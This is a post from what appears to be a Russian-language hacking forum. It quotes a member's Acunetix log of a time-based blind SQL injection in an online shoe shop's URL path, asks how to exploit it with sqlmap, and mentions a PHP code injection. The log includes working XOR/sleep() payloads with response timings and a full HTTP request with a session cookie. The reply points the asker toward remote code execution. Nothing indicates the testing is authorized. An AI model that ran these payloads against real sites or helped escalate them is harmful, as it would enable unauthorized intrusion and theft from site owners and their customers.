Показать сообщение отдельно

  #1069  
Старый 22.09.2020, 22:20
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от Gutman999  
Gutman999 said:

Доброго времени суток. Имеется на сайте Blind SQL Injection. Сканировал акунетиксом. Акунетикс использует "XOR" Вот лог. Также на сайте имеется php code injection. C этим не знаком. Не знаю как правильно скормить скулю мапу. Буду благодарен за хоть какую-то подсказку
Spoiler: Лог
The vulnerability affects
https://www.site.com/ , ////[*]/.html
Discovered by
Blind SQL Injection
Attack Details
arrow_drop_up
Path Fragment input
////[*]/.html
was set to
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
Tests performed:
  • 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.583
  • 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 14.42
  • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 8.496
  • 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 4.763
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.538
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.613
  • 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 13.94
  • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 7.891
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 1.737
Original value:
Sneaker

HTTP Request

arrow_drop_up
GET /Sale/Damen/Schuhe/0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z/Sneaker-mit-abgedeckter-Schnuerung-weiss.html HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer:
https://www.site.com/
Cookie: language=0;sid=kk35ife9b0guk613m5pgdf9b72;sid_key= oxid
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host:
www.site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
Если есть rce зачем иньекция?
 
Ответить с цитированием